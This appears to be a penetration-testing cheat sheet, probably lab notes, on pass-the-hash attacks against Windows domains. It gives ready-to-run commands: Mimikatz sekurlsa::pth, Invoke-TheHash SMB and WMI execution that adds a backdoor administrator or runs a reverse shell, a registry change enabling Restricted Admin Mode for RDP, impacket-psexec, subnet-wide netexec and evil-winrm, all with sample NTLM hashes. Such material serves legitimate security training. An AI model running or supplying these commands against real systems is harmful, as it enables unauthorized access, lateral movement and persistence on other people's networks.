----------------------------
      PtH - Mimikatz
----------------------------
mimikatz.exe
/user:<username>
/rc4:<rc4 hash> or /NTLM:<ntlm hash>
/domain:<domain name>
/run:<program to run e.g. cmd.exe>

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

----------------------------
  PtH - PS Invoke-TheHash
----------------------------
- https://github.com/Kevin-Robertson/Invoke-TheHash

1. Invoke-TheHash with SMB

Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

2. Invoke-TheHash with WMI

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "<revshell payload>"

----------------------------
         PtH - RDP
----------------------------

Note:
- Restricted Admin Mode, which is disabled by default, should be enabled on the target host
- otherwise, you will be presented with the error:
"""
Account restrictions are preventing this user from signing. For Example: blank passwords aren't allowed, sign-in times are limited, or policy restriction has been enforced.
"""
- This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0

1. Enable Restricted Admin Mode to allow PtH

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

2. PtH using xfreerdp

xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

--------------------------------------------------------
    PtH - UAC limits Pass the Hash for local accounts
--------------------------------------------------------
- UAC (User Account Control) limits local users' ability to perform remote administration operations 
- When the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to perform remote administration tasks 
- Setting it to 1 allows the other local admins as well
(Note: There is one exception, if the registry key FilterAdministratorToken (disabled by default) is enabled (value 1), the RID 500 account (even if it is renamed) is enrolled in UAC protection. This means that remote PTH will fail against the machine when using that account.)

Resource: https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167

----------------------------
  PtH - Impacket (Linux)
----------------------------

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

----------------------------
  PtH - NetExec (Linux)
----------------------------

netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

----------------------------
  PtH - evil-winrm (Linux)
----------------------------

evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
